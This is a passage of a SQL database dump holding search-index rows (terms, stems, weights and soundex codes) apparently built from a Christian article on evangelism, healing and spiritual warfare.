(273418, 'requires that every', 'requir that every', 0, 1, 1.6333, 'R262316', 1, '*'),
(273419, 'responsibilities your', 'respons your', 0, 1, 1.7, 'R215214326', 1, '*'),
(273420, 'responsibilities your first', 'respons your first', 0, 1, 1.9, 'R2152143261623', 1, '*'),
(273421, 'revelation', 'revel', 0, 0, 0.6667, 'R1435', 2, '*'),
(273422, 'revelation 3', 'revel 3', 0, 1, 1.4, 'R1435', 1, '*'),
(273423, 'revelation 3 15-16', 'revel 3 15-16', 0, 1, 1.6, 'R1435', 1, '*'),
(273424, 'right now and', 'right now and', 0, 1, 1.4333, 'R2353', 1, '*'),
(273425, 'rights', 'right', 0, 0, 0.4, 'R232', 1, '*'),
(273426, 'rights contamination', 'right contamination', 0, 1, 1.6667, 'R23253535', 1, '*'),
(273427, 'rights contamination of', 'right contamination of', 0, 1, 1.7667, 'R232535351', 1, '*'),
(273428, 'romans 8 26-27', 'roman 8 26-27', 0, 1, 1.4667, 'R520', 1, '*'),
(273429, 'room to pray', 'room to pray', 0, 1, 1.4, 'R5316', 1, '*'),
(273430, 'sadly however', 'sadli however', 0, 1, 1.4333, 'S3416', 1, '*'),
(273431, 'sadly however in', 'sadli however in', 0, 1, 1.5333, 'S34165', 1, '*'),
(273432, 'said we', 'said we', 0, 1, 1.2333, 'S300', 1, '*'),
(273433, 'said we should', 'said we should', 0, 1, 1.4667, 'S3243', 1, '*'),
(273434, 'say about', 'sai about', 0, 1, 1.3, 'S130', 1, '*'),
(273435, 'say about their', 'sai about their', 0, 1, 1.5, 'S136', 1, '*'),
(273436, 'says referring', 'sai referring', 0, 1, 1.4667, 'S61652', 1, '*'),
(273437, 'says referring to', 'sai referring to', 0, 1, 1.5667, 'S616523', 1, '*'),
(273438, 'serpents', 'serpent', 0, 0, 0.5333, 'S61532', 1, '*'),
(273439, 'serpents and', 'serpent and', 0, 1, 1.4, 'S6153253', 1, '*'),
(273440, 'serpents and if', 'serpent and if', 0, 1, 1.5, 'S61532531', 1, '*'),
(273441, 'serve god duties', 'serv god duties', 0, 1, 1.5333, 'S61232', 1, '*'),
(273442, 'shall lay', 'shall lay', 0, 1, 1.3, 'S400', 1, '*'),
(273443, 'shall lay hands', 'shall lay hands', 0, 1, 1.5, 'S4532', 1, '*'),
(273444, 'shall not hurt', 'shall not hurt', 0, 1, 1.4667, 'S45363', 1, '*'),
(273445, 'shall recover', 'shall recover', 0, 1, 1.4333, 'S46216', 1, '*'),
(273446, 'shall recover these', 'shall recover these', 0, 1, 1.6333, 'S4621632', 1, '*'),
(273447, 'shall take', 'shall take', 0, 1, 1.3333, 'S432', 1, '*'),
(273448, 'shall take up', 'shall take up', 0, 1, 1.4333, 'S4321', 1, '*'),
(273449, 'shallow', 'shallow', 0, 0, 0.4667, 'S400', 1, '*'),
(273450, 'shallow in', 'shallow in', 0, 1, 1.3333, 'S450', 1, '*'),
(273451, 'shallow in their', 'shallow in their', 0, 1, 1.5333, 'S4536', 1, '*'),
(273452, 'share on', 'share on', 0, 1, 1.2667, 'S650', 1, '*'),
(273453, 'share on earth', 'share on earth', 0, 1, 1.4667, 'S6563', 1, '*'),
(273454, 'sheepfold', 'sheepfold', 0, 0, 0.6, 'S143', 1, '*'),
(273455, 'sheepfold and', 'sheepfold and', 0, 1, 1.4333, 'S14353', 1, '*'),
(273456, 'sheepfold and pulpit', 'sheepfold and pulpit', 0, 1, 1.6667, 'S143531413', 1, '*'),
(273457, 'should baptize', 'should baptize', 0, 1, 1.4667, 'S43132', 1, '*'),
(273458, 'should baptize them', 'should baptize them', 0, 1, 1.6333, 'S4313235', 1, '*'),
(273459, 'should have learnt', 'should have learnt', 0, 1, 1.6, 'S4314653', 1, '*'),
(273460, 'shown', 'shown', 0, 0, 0.3333, 'S500', 1, '*'),
(273461, 'shown here', 'shown here', 0, 1, 1.3333, 'S560', 1, '*'),
(273462, 'shown here you', 'shown here you', 0, 1, 1.4667, 'S560', 1, '*'),
(273463, 'shows us', 'show us', 0, 1, 1.2667, 'S000', 1, '*'),
(273464, 'shows us what', 'show us what', 0, 1, 1.4333, 'S300', 1, '*'),
(273465, 'sick and', 'sick and', 0, 1, 1.2667, 'S530', 1, '*'),
(273466, 'sick and we', 'sick and we', 0, 1, 1.3667, 'S530', 1, '*'),
(273467, 'sick your', 'sick your', 0, 1, 1.3, 'S600', 1, '*'),
(273468, 'sick your failure', 'sick your failure', 0, 1, 1.5667, 'S6146', 1, '*'),
(273469, 'situation future', 'situat future', 0, 1, 1.5333, 'S35136', 1, '*'),
(273470, 'situation future and', 'situat future and', 0, 1, 1.6667, 'S3513653', 1, '*'),
(273471, 'so is another', 'so is another', 0, 1, 1.4333, 'S536', 1, '*'),
(273472, 'soccer', 'soccer', 0, 0, 0.4, 'S600', 1, '*'),
(273473, 'soccer game', 'soccer game', 0, 1, 1.3667, 'S625', 1, '*'),
(273474, 'soccer game than', 'soccer game than', 0, 1, 1.5333, 'S62535', 1, '*'),
(273475, 'soldier that', 'soldier that', 0, 1, 1.4, 'S4363', 1, '*'),
(273476, 'soldier that doesn\'t', 'soldier that doesn', 0, 1, 1.6667, 'S4363253', 1, '*'),
(273477, 'soldiers', 'soldier', 0, 0, 0.5333, 'S4362', 1, '*'),
(273478, 'soldiers we', 'soldier we', 0, 1, 1.3667, 'S4362', 1, '*'),
(273479, 'soldiers we have', 'soldier we have', 0, 1, 1.5333, 'S43621', 1, '*'),
(273480, 'solve them', 'solv them', 0, 1, 1.3333, 'S4135', 1, '*'),
(273481, 'solve them 1', 'solv them 1', 0, 1, 1.4, 'S4135', 1, '*'),
(273482, 'souls of', 'soul of', 0, 1, 1.2667, 'S421', 1, '*'),
(273483, 'souls of men', 'soul of men', 0, 1, 1.4, 'S4215', 1, '*'),
(273484, 'spirit to effectively', 'spirit to effectively', 0, 1, 1.7, 'S16312314', 1, '*'),
(273485, 'spiritual responsibilities', 'spiritu responsibilities', 0, 1, 1.8667, 'S1634621521432', 1, '*'),
(273486, 'spiritual responsibilities your', 'spiritu responsibilities your', 0, 1, 2, 'S16346215214326', 1, '*'),
(273487, 'spiritual walk', 'spiritu walk', 0, 1, 1.4667, 'S16342', 1, '*'),
(273488, 'spiritual walk with', 'spiritu walk with', 0, 1, 1.6333, 'S163423', 1, '*'),
(273489, 'spread the', 'spread the', 0, 1, 1.3333, 'S163', 1, '*'),
(273490, 'spread the gospel', 'spread the gospel', 0, 1, 1.5667, 'S163214', 1, '*'),
(273491, 'start a new', 'start a new', 0, 1, 1.3667, 'S3635', 1, '*'),
(273492, 'status that', 'statu that', 0, 1, 1.3667, 'S323', 1, '*'),
(273493, 'status that they', 'statu that they', 0, 1, 1.5333, 'S323', 1, '*'),
(273494, 'steady', 'steadi', 0, 0, 0.4, 'S300', 1, '*'),
(273495, 'steady quiet', 'steadi quiet', 0, 1, 1.4, 'S323', 1, '*'),
(273496, 'steady quiet time', 'steadi quiet time', 0, 1, 1.5667, 'S3235', 1, '*'),
(273497, 'stop there', 'stop there', 0, 1, 1.3333, 'S3136', 1, '*'),
(273498, 'stop there in', 'stop there in', 0, 1, 1.4333, 'S31365', 1, '*'),
(273499, 'stop to', 'stop to', 0, 1, 1.2333, 'S313', 1, '*'),
(273500, 'stop to his', 'stop to his', 0, 1, 1.3667, 'S3132', 1, '*'),
(273501, 'strong enough', 'strong enough', 0, 1, 1.4333, 'S365252', 1, '*'),
(273502, 'strong enough in', 'strong enough in', 0, 1, 1.5333, 'S3652525', 1, '*'),
(273503, 'strong understanding', 'strong understanding', 0, 1, 1.6667, 'S3652536235352', 1, '*'),
(273504, 'strong understanding of', 'strong understanding of', 0, 1, 1.7667, 'S36525362353521', 1, '*'),
(273505, 'study and', 'studi and', 0, 1, 1.3, 'S353', 1, '*'),
(273506, 'study and the', 'studi and the', 0, 1, 1.4333, 'S353', 1, '*'),
(273507, 'such as career', 'such as career', 0, 1, 1.4667, 'S600', 1, '*'),
(273508, 'sunday the', 'sundai the', 0, 1, 1.3333, 'S530', 1, '*'),
(273509, 'sunday the direct', 'sundai the direct', 0, 1, 1.5667, 'S53623', 1, '*'),
(273510, 'sure the', 'sure the', 0, 1, 1.2667, 'S630', 1, '*'),
(273511, 'sure the majority', 'sure the majority', 0, 1, 1.5667, 'S635263', 1, '*'),
(273512, 'take up serpents', 'take up serpents', 0, 1, 1.5333, 'T21261532', 1, '*'),
(273513, 'teach others', 'teach others', 0, 1, 1.4, 'T2362', 1, '*'),
(273514, 'teach others also', 'teach others also', 0, 1, 1.5667, 'T236242', 1, '*'),
(273515, 'teach the', 'teach the', 0, 1, 1.3, 'T230', 1, '*'),
(273516, 'teach the gospel', 'teach the gospel', 0, 1, 1.5333, 'T23214', 1, '*'),
(273517, 'teach the nations', 'teach the nations', 0, 1, 1.5667, 'T235352', 1, '*'),
(273518, 'teach them', 'teach them', 0, 1, 1.3333, 'T235', 1, '*'),
(273519, 'teach them to', 'teach them to', 0, 1, 1.4333, 'T2353', 1, '*'),
(273520, 'testament this', 'testament this', 0, 1, 1.4667, 'T23532', 1, '*'),
(273521, 'testament this is', 'testament this is', 0, 1, 1.5667, 'T23532', 1, '*'),
(273522, 'than they would', 'than they would', 0, 1, 1.5, 'T5343', 1, '*'),
(273523, 'that a lot', 'that a lot', 0, 1, 1.3333, 'T430', 1, '*'),
(273524, 'that allows', 'that allows', 0, 1, 1.3667, 'T420', 1, '*'),
(273525, 'that allows god', 'that allows god', 0, 1, 1.5, 'T423', 1, '*'),
(273526, 'that are added', 'that are added', 0, 1, 1.4667, 'T630', 1, '*'),
(273527, 'that doesn\'t', 'that doesn', 0, 1, 1.4, 'T253', 1, '*'),
(273528, 'that doesn\'t know', 'that doesn know', 0, 1, 1.5667, 'T25325', 1, '*'),
(273529, 'that every christian', 'that every christian', 0, 1, 1.6667, 'T1626235', 1, '*'),
(273530, 'that every member', 'that every member', 0, 1, 1.5667, 'T16516', 1, '*'),
(273531, 'that it puts', 'that it puts', 0, 1, 1.4, 'T132', 1, '*'),
(273532, 'that produce', 'that produce', 0, 1, 1.4, 'T1632', 1, '*'),
(273533, 'that produce christians', 'that produce christians', 0, 1, 1.7667, 'T163262352', 1, '*'),
(273534, 'that they ignore', 'that they ignore', 0, 1, 1.5333, 'T256', 1, '*'),
(273535, 'that thou art', 'that thou art', 0, 1, 1.4333, 'T630', 1, '*'),
(273536, 'that we shall', 'that we shall', 0, 1, 1.4333, 'T240', 1, '*'),
(273537, 'that you\'re there', 'that you there', 0, 1, 1.5667, 'T636', 1, '*'),
(273538, 'the advantage', 'the advantage', 0, 1, 1.4333, 'T1532', 1, '*'),
(273539, 'the advantage it', 'the advantage it', 0, 1, 1.5333, 'T15323', 1, '*'),
(273540, 'the basic and', 'the basic and', 0, 1, 1.4333, 'T1253', 1, '*'),
(273541, 'the bible has', 'the bible has', 0, 1, 1.4333, 'T142', 1, '*'),
(273542, 'the bible shows', 'the bible shows', 0, 1, 1.5, 'T142', 1, '*'),
(273543, 'the bible without', 'the bible without', 0, 1, 1.5667, 'T143', 1, '*'),
(273544, 'the christian because', 'the christian because', 0, 1, 1.7, 'T2623512', 1, '*'),
(273545, 'the church about', 'the church about', 0, 1, 1.5333, 'T26213', 1, '*'),
(273546, 'the commandments', 'the commandments', 0, 1, 1.5333, 'T253532', 1, '*'),
(273547, 'the commandments given', 'the commandments given', 0, 1, 1.7333, 'T25353215', 1, '*'),
(273548, 'the commandments he', 'the commandments he', 0, 1, 1.6333, 'T253532', 1, '*'),
(273549, 'the concepts', 'the concepts', 0, 1, 1.4, 'T252132', 1, '*'),
(273550, 'the concepts and', 'the concepts and', 0, 1, 1.5333, 'T25213253', 1, '*'),
(273551, 'the devil can', 'the devil can', 0, 1, 1.4333, 'T1425', 1, '*'),
(273552, 'the devil have', 'the devil have', 0, 1, 1.4667, 'T141', 1, '*'),
(273553, 'the devil such', 'the devil such', 0, 1, 1.4667, 'T142', 1, '*'),
(273554, 'the direct', 'the direct', 0, 1, 1.3333, 'T623', 1, '*'),
(273555, 'the direct danger', 'the direct danger', 0, 1, 1.5667, 'T623526', 1, '*'),
(273556, 'the earth in', 'the earth in', 0, 1, 1.4, 'T635', 1, '*'),
(273557, 'the efficiency', 'the efficiency', 0, 1, 1.4667, 'T1252', 1, '*'),
(273558, 'the efficiency of', 'the efficiency of', 0, 1, 1.5667, 'T12521', 1, '*'),
(273559, 'the enemy and', 'the enemy and', 0, 1, 1.4333, 'T530', 1, '*'),
(273560, 'the enemy he', 'the enemy he', 0, 1, 1.4, 'T500', 1, '*'),
(273561, 'the enemy you', 'the enemy you', 0, 1, 1.4333, 'T500', 1, '*'),
(273562, 'the first person', 'the first person', 0, 1, 1.5333, 'T16231625', 1, '*'),
(273563, 'the first place', 'the first place', 0, 1, 1.5, 'T1623142', 1, '*'),
(273564, 'the following you', 'the following you', 0, 1, 1.5667, 'T1452', 1, '*'),
(273565, 'the good news', 'the good news', 0, 1, 1.4333, 'T2352', 1, '*'),
(273566, 'the gospel to', 'the gospel to', 0, 1, 1.4333, 'T2143', 2, '*'),
(273567, 'the life oasis', 'the life oasis', 0, 1, 1.4667, 'T412', 1, '*'),
(273568, 'the major problems', 'the major problems', 0, 1, 1.6, 'T526161452', 1, '*'),
(273569, 'the majority of', 'the majority of', 0, 1, 1.5, 'T52631', 1, '*'),
(273570, 'the miraculous', 'the miraculous', 0, 1, 1.4667, 'T56242', 1, '*'),
(273571, 'the miraculous shown', 'the miraculous shown', 0, 1, 1.6667, 'T562425', 1, '*'),
(273572, 'the nations but', 'the nations but', 0, 1, 1.5, 'T535213', 1, '*'),
(273573, 'the nations this', 'the nations this', 0, 1, 1.5333, 'T535232', 1, '*'),
(273574, 'the nearest', 'the nearest', 0, 1, 1.3667, 'T5623', 1, '*'),
(273575, 'the nearest hospital', 'the nearest hospital', 0, 1, 1.6667, 'T56232134', 1, '*'),
(273576, 'the new birth', 'the new birth', 0, 1, 1.4333, 'T5163', 1, '*'),
(273577, 'the old and', 'the old and', 0, 1, 1.3667, 'T4353', 1, '*'),
(273578, 'the pastors', 'the pastors', 0, 1, 1.3667, 'T12362', 1, '*'),
(273579, 'the pastors alone', 'the pastors alone', 0, 1, 1.5667, 'T1236245', 1, '*'),
(273580, 'the point now', 'the point now', 0, 1, 1.4333, 'T1535', 1, '*'),
(273581, 'the real reason', 'the real reason', 0, 1, 1.5, 'T64625', 1, '*'),
(273582, 'the remaining', 'the remaining', 0, 1, 1.4333, 'T652', 1, '*'),
(273583, 'the remaining requirements', 'the remaining requirements', 0, 1, 1.8667, 'T652626532', 1, '*'),
(273584, 'the sheepfold', 'the sheepfold', 0, 1, 1.4333, 'T2143', 1, '*'),
(273585, 'the sheepfold and', 'the sheepfold and', 0, 1, 1.5667, 'T214353', 1, '*'),
(273586, 'the sick and', 'the sick and', 0, 1, 1.4, 'T253', 1, '*'),
(273587, 'the sick your', 'the sick your', 0, 1, 1.4333, 'T260', 1, '*'),
(273588, 'the souls', 'the souls', 0, 1, 1.3, 'T242', 1, '*'),
(273589, 'the souls of', 'the souls of', 0, 1, 1.4, 'T2421', 1, '*'),
(273590, 'the world people', 'the world people', 0, 1, 1.5333, 'T64314', 1, '*'),
(273591, 'the world such', 'the world such', 0, 1, 1.4667, 'T6432', 1, '*'),
(273592, 'their faith to', 'their faith to', 0, 1, 1.4667, 'T613', 1, '*'),
(273593, 'their rights', 'their rights', 0, 1, 1.4, 'T6232', 1, '*'),
(273594, 'their rights contamination', 'their rights contamination', 0, 1, 1.8667, 'T623253535', 1, '*'),
(273595, 'their situation', 'their situation', 0, 1, 1.5, 'T6235', 1, '*'),
(273596, 'their situation future', 'their situation future', 0, 1, 1.7333, 'T6235136', 1, '*'),
(273597, 'their word', 'their word', 0, 1, 1.3333, 'T630', 1, '*'),
(273598, 'their word level', 'their word level', 0, 1, 1.5333, 'T63414', 1, '*'),
(273599, 'them 1', 'them 1', 0, 1, 1.2, 'T500', 1, '*'),
(273600, 'them 1 corinthians', 'them 1 corinthians', 0, 1, 1.6, 'T5265352', 1, '*'),
(273601, 'them in his', 'them in his', 0, 1, 1.3667, 'T520', 1, '*'),
(273602, 'them to be', 'them to be', 0, 1, 1.3333, 'T531', 2, '*'),
(273603, 'them to observe', 'them to observe', 0, 1, 1.5, 'T531261', 1, '*'),
(273604, 'there in', 'there in', 0, 1, 1.2667, 'T650', 1, '*'),
(273605, 'there in matthew\'s', 'there in matthew', 0, 1, 1.6, 'T6532', 1, '*'),
(273606, 'there is widespread', 'there is widespread', 0, 1, 1.6333, 'T6232163', 1, '*'),
(273607, 'there to', 'there to', 0, 1, 1.2667, 'T630', 1, '*'),
(273608, 'there to heal', 'there to heal', 0, 1, 1.4333, 'T634', 1, '*'),
(273609, 'these are all', 'these are all', 0, 1, 1.4333, 'T264', 1, '*'),
(273610, 'these baptisms', 'these baptisms', 0, 1, 1.4667, 'T213252', 1, '*'),
(273611, 'these baptisms include', 'these baptisms include', 0, 1, 1.7333, 'T2132525243', 1, '*'),
(273612, 'these modern', 'these modern', 0, 1, 1.4, 'T25365', 1, '*'),
(273613, 'these modern times', 'these modern times', 0, 1, 1.6, 'T25365352', 1, '*'),
(273614, 'they are alive', 'thei are alive', 0, 1, 1.4667, 'T641', 1, '*'),
(273615, 'they are losing', 'thei are losing', 0, 1, 1.5, 'T64252', 1, '*'),
(273616, 'they barely', 'thei barely', 0, 1, 1.3667, 'T164', 1, '*'),
(273617, 'they barely know', 'thei barely know', 0, 1, 1.5333, 'T16425', 1, '*'),
(273618, 'they can comfortable', 'thei can comfortable', 0, 1, 1.6667, 'T252516314', 1, '*'),
(273619, 'they don\'t just', 'thei don just', 0, 1, 1.5, 'T5323', 1, '*'),
(273620, 'they ignore', 'thei ignore', 0, 1, 1.3667, 'T256', 1, '*'),
(273621, 'they ignore the', 'thei ignore the', 0, 1, 1.5, 'T2563', 1, '*'),
(273622, 'they would in', 'thei would in', 0, 1, 1.4333, 'T435', 1, '*'),
(273623, 'thing it', 'thing it', 0, 1, 1.2667, 'T523', 1, '*'),
(273624, 'thing it shall', 'thing it shall', 0, 1, 1.4667, 'T52324', 1, '*'),
(273625, 'thing understanding', 'thing understanding', 0, 1, 1.6333, 'T52536235352', 1, '*'),
(273626, 'thing understanding clearly', 'thing understanding clearly', 0, 1, 1.9, 'T52536235352464', 1, '*'),
(273627, 'things of the', 'thing of the', 0, 1, 1.4333, 'T5213', 1, '*'),
(273628, 'this is directly', 'thi is directly', 0, 1, 1.5333, 'T236234', 1, '*'),
(273629, 'this is important', 'thi is important', 0, 1, 1.5667, 'T2516353', 1, '*'),
(273630, 'this is that', 'thi is that', 0, 1, 1.4, 'T230', 1, '*'),
(273631, 'this is yourcore', 'thi is yourcore', 0, 1, 1.5333, 'T2626', 1, '*'),
(273632, 'this problem', 'thi problem', 0, 1, 1.4, 'T216145', 1, '*'),
(273633, 'this problem i', 'thi problem i', 0, 1, 1.4667, 'T216145', 1, '*'),
(273634, 'this that produce', 'thi that produce', 0, 1, 1.5667, 'T231632', 1, '*'),
(273635, 'this war', 'thi war', 0, 1, 1.2667, 'T260', 1, '*'),
(273636, 'this war we', 'thi war we', 0, 1, 1.3667, 'T260', 1, '*'),
(273637, 'those commandments', 'those commandments', 0, 1, 1.6, 'T253532', 1, '*'),
(273638, 'those commandments properly', 'those commandments properly', 0, 1, 1.9, 'T25353216164', 1, '*'),
(273639, 'thou art', 'thou art', 0, 1, 1.2667, 'T630', 1, '*'),
(273640, 'thou art neither', 'thou art neither', 0, 1, 1.5333, 'T63536', 1, '*'),
(273641, 'thou wert', 'thou wert', 0, 1, 1.3, 'T630', 1, '*'),
(273642, 'thou wert cold', 'thou wert cold', 0, 1, 1.4667, 'T63243', 1, '*'),
(273643, 'threat', 'threat', 0, 0, 0.4, 'T630', 1, '*'),
(273644, 'threat to', 'threat to', 0, 1, 1.3, 'T630', 1, '*'),
(273645, 'threat to the', 'threat to the', 0, 1, 1.4333, 'T630', 1, '*'),
(273646, 'through right', 'through right', 0, 1, 1.4333, 'T62623', 1, '*'),
(273647, 'through right now', 'through right now', 0, 1, 1.5667, 'T626235', 1, '*'),
(273648, 'through what', 'through what', 0, 1, 1.4, 'T623', 1, '*'),
(273649, 'through what you', 'through what you', 0, 1, 1.5333, 'T623', 1, '*'),
(273650, 'through you', 'through you', 0, 1, 1.3667, 'T620', 2, '*'),
(273651, 'through you knowing', 'through you knowing', 0, 1, 1.6333, 'T6252', 1, '*'),
(273652, 'through you to', 'through you to', 0, 1, 1.4667, 'T623', 1, '*'),
(273653, 'thy works that', 'thy works that', 0, 1, 1.4667, 'T623', 1, '*'),
(273654, 'time and as', 'time and as', 0, 1, 1.3667, 'T532', 1, '*'),
(273655, 'time they', 'time they', 0, 1, 1.3, 'T530', 2, '*'),
(273656, 'time they barely', 'time they barely', 0, 1, 1.5333, 'T53164', 1, '*'),
(273657, 'time watching', 'time watching', 0, 1, 1.4333, 'T53252', 1, '*'),
(273658, 'time watching a', 'time watching a', 0, 1, 1.5, 'T53252', 1, '*'),
(273659, 'times we', 'time we', 0, 1, 1.2667, 'T520', 1, '*'),
(273660, 'times we christians', 'time we christians', 0, 1, 1.6333, 'T5262352', 1, '*'),
(273661, 'to a place', 'to a place', 0, 1, 1.3333, 'T142', 1, '*'),
(273662, 'to a point', 'to a point', 0, 1, 1.3333, 'T153', 1, '*'),
(273663, 'to all the', 'to all the', 0, 1, 1.3333, 'T430', 1, '*'),
(273664, 'to be called', 'to be called', 0, 1, 1.4, 'T1243', 1, '*'),
(273665, 'to be god\'s', 'to be god', 0, 1, 1.3667, 'T1232', 1, '*'),
(273666, 'to carry out', 'to carry out', 0, 1, 1.4, 'T263', 1, '*'),
(273667, 'to cast', 'to cast', 0, 1, 1.2333, 'T230', 2, '*'),
(273668, 'to cast out', 'to cast out', 0, 1, 1.3667, 'T230', 1, '*'),
(273669, 'to christians', 'to christians', 0, 1, 1.4333, 'T262352', 1, '*'),
(273670, 'to christians who', 'to christians who', 0, 1, 1.5667, 'T262352', 1, '*'),
(273671, 'to church', 'to church', 0, 1, 1.3, 'T262', 2, '*'),
(273672, 'to church already', 'to church already', 0, 1, 1.5667, 'T262463', 1, '*'),
(273673, 'to deceive', 'to deceive', 0, 1, 1.3333, 'T210', 1, '*'),
(273674, 'to deceive you', 'to deceive you', 0, 1, 1.4667, 'T210', 1, '*'),
(273675, 'to do his', 'to do his', 0, 1, 1.3, 'T200', 1, '*'),
(273676, 'to effectively', 'to effectively', 0, 1, 1.4667, 'T12314', 1, '*'),
(273677, 'to effectively teach', 'to effectively teach', 0, 1, 1.6667, 'T1231432', 1, '*'),
(273678, 'to follow those', 'to follow those', 0, 1, 1.5, 'T1432', 1, '*'),
(273679, 'to guide', 'to guide', 0, 1, 1.2667, 'T230', 1, '*'),
(273680, 'to guide and', 'to guide and', 0, 1, 1.4, 'T2353', 1, '*'),
(273681, 'to heal', 'to heal', 0, 1, 1.2333, 'T400', 1, '*'),
(273682, 'to heal the', 'to heal the', 0, 1, 1.3667, 'T430', 1, '*'),
(273683, 'to his operations', 'to his operations', 0, 1, 1.5667, 'T216352', 1, '*'),
(273684, 'to observe', 'to observe', 0, 1, 1.3333, 'T1261', 1, '*'),
(273685, 'to observe all', 'to observe all', 0, 1, 1.4667, 'T12614', 1, '*'),
(273686, 'to operate at', 'to operate at', 0, 1, 1.4333, 'T163', 1, '*'),
(273687, 'to operate his', 'to operate his', 0, 1, 1.4667, 'T1632', 1, '*'),
(273688, 'to pass through', 'to pass through', 0, 1, 1.5, 'T12362', 1, '*'),
(273689, 'to people anywhere', 'to people anywhere', 0, 1, 1.6, 'T1456', 1, '*'),
(273690, 'to pray through', 'to pray through', 0, 1, 1.5, 'T16362', 1, '*'),
(273691, 'to say about', 'to say about', 0, 1, 1.4, 'T213', 1, '*'),
(273692, 'to solve them', 'to solve them', 0, 1, 1.4333, 'T24135', 1, '*'),
(273693, 'to spread', 'to spread', 0, 1, 1.3, 'T2163', 1, '*'),
(273694, 'to spread the', 'to spread the', 0, 1, 1.4333, 'T2163', 1, '*'),
(273695, 'to teach', 'to teach', 0, 1, 1.2667, 'T200', 1, '*'),
(273696, 'to teach the', 'to teach the', 0, 1, 1.4, 'T230', 1, '*'),
(273697, 'to the nations', 'to the nations', 0, 1, 1.4667, 'T5352', 1, '*'),
(273698, 'to the nearest', 'to the nearest', 0, 1, 1.4667, 'T5623', 1, '*'),
(273699, 'to us that', 'to us that', 0, 1, 1.3333, 'T230', 1, '*'),
(273700, 'to walk in', 'to walk in', 0, 1, 1.3333, 'T425', 2, '*'),
(273701, 'to work through', 'to work through', 0, 1, 1.5, 'T62362', 1, '*'),
(273702, 'today can\'t', 'todai can', 0, 1, 1.3667, 'T253', 1, '*'),
(273703, 'today can\'t boast', 'todai can boast', 0, 1, 1.5667, 'T253123', 1, '*'),
(273704, 'today\'s christian', 'todai christian', 0, 1, 1.5667, 'T26235', 1, '*'),
(273705, 'today\'s christian and', 'todai christian and', 0, 1, 1.7, 'T262353', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(273706, 'today\'s christianity', 'todai christianity', 0, 1, 1.6667, 'T262353', 1, '*'),
(273707, 'today\'s christianity there', 'todai christianity there', 0, 1, 1.8667, 'T2623536', 1, '*'),
(273708, 'tongues and', 'tongu and', 0, 1, 1.3667, 'T5253', 1, '*'),
(273709, 'tongues and have', 'tongu and have', 0, 1, 1.5333, 'T52531', 1, '*'),
(273710, 'tongues is', 'tongu is', 0, 1, 1.3333, 'T520', 1, '*'),
(273711, 'tongues is a', 'tongu is a', 0, 1, 1.4, 'T520', 1, '*'),
(273712, 'tongues is one', 'tongu is one', 0, 1, 1.4667, 'T525', 1, '*'),
(273713, 'tongues you', 'tongu you', 0, 1, 1.3667, 'T520', 1, '*'),
(273714, 'tongues you must', 'tongu you must', 0, 1, 1.5333, 'T52523', 1, '*'),
(273715, 'too churchy', 'too churchy', 0, 1, 1.3667, 'T262', 1, '*'),
(273716, 'too churchy to', 'too churchy to', 0, 1, 1.4667, 'T2623', 1, '*'),
(273717, 'too fixated', 'too fixated', 0, 1, 1.3667, 'T123', 1, '*'),
(273718, 'too fixated on', 'too fixated on', 0, 1, 1.4667, 'T1235', 1, '*'),
(273719, 'too worldly', 'too worldly', 0, 1, 1.3667, 'T6434', 1, '*'),
(273720, 'too worldly to', 'too worldly to', 0, 1, 1.4667, 'T64343', 1, '*'),
(273721, 'tool for the', 'tool for the', 0, 1, 1.4, 'T4163', 1, '*'),
(273722, 'tool to', 'tool to', 0, 1, 1.2333, 'T430', 1, '*'),
(273723, 'tool to bring', 'tool to bring', 0, 1, 1.4333, 'T431652', 1, '*'),
(273724, 'unbelievers', 'unbeliev', 0, 0, 0.7333, 'U514162', 1, '*'),
(273725, 'unbelievers i', 'unbeliev i', 0, 1, 1.4333, 'U514162', 1, '*'),
(273726, 'unbelievers i know', 'unbeliev i know', 0, 1, 1.6, 'U5141625', 1, '*'),
(273727, 'understand the', 'understand the', 0, 1, 1.4667, 'U5362353', 2, '*'),
(273728, 'understand the wiles', 'understand the wiles', 0, 1, 1.6667, 'U536235342', 1, '*'),
(273729, 'understand what\'s', 'understand what', 0, 1, 1.5667, 'U53623532', 1, '*'),
(273730, 'understand what\'s happening', 'understand what happening', 0, 1, 1.9, 'U53623532152', 1, '*'),
(273731, 'understanding clearly', 'understand clearly', 0, 1, 1.7, 'U536235352464', 1, '*'),
(273732, 'understanding clearly why', 'understand clearly why', 0, 1, 1.8333, 'U536235352464', 1, '*'),
(273733, 'understanding for', 'understand for', 0, 1, 1.5667, 'U53623535216', 1, '*'),
(273734, 'understanding for them', 'understand for them', 0, 1, 1.7333, 'U5362353521635', 1, '*'),
(273735, 'understanding of the', 'understand of the', 0, 1, 1.6667, 'U53623535213', 1, '*'),
(273736, 'up serpents', 'up serpents', 0, 1, 1.3667, 'U1261532', 1, '*'),
(273737, 'up serpents and', 'up serpents and', 0, 1, 1.5, 'U126153253', 1, '*'),
(273738, 'upon the kingdom', 'upon the kingdom', 0, 1, 1.5333, 'U15325235', 1, '*'),
(273739, 'us god', 'us god', 0, 1, 1.2, 'U230', 2, '*'),
(273740, 'us god requires', 'us god requires', 0, 1, 1.5, 'U236262', 1, '*'),
(273741, 'us that we', 'us that we', 0, 1, 1.3333, 'U230', 1, '*'),
(273742, 'us we shall', 'us we shall', 0, 1, 1.3667, 'U240', 1, '*'),
(273743, 'us what', 'us what', 0, 1, 1.2333, 'U230', 1, '*'),
(273744, 'us what happens', 'us what happens', 0, 1, 1.5, 'U23152', 1, '*'),
(273745, 'verse 18 the', 'vers 18 the', 0, 1, 1.4, 'V623', 1, '*'),
(273746, 'very long', 'veri long', 0, 1, 1.3, 'V6452', 1, '*'),
(273747, 'very long time', 'veri long time', 0, 1, 1.4667, 'V645235', 1, '*'),
(273748, 'very powerful tool', 'veri powerful tool', 0, 1, 1.6, 'V6161434', 1, '*'),
(273749, 'walk in the', 'walk in the', 0, 1, 1.3667, 'W4253', 1, '*'),
(273750, 'walk up', 'walk up', 0, 1, 1.2333, 'W421', 1, '*'),
(273751, 'walk up to', 'walk up to', 0, 1, 1.3333, 'W4213', 1, '*'),
(273752, 'war for', 'war for', 0, 1, 1.2333, 'W616', 1, '*'),
(273753, 'war for the', 'war for the', 0, 1, 1.3667, 'W6163', 1, '*'),
(273754, 'war we', 'war we', 0, 1, 1.2, 'W600', 1, '*'),
(273755, 'war we are', 'war we are', 0, 1, 1.3333, 'W600', 1, '*'),
(273756, 'watching a', 'watch a', 0, 1, 1.3333, 'W3252', 1, '*'),
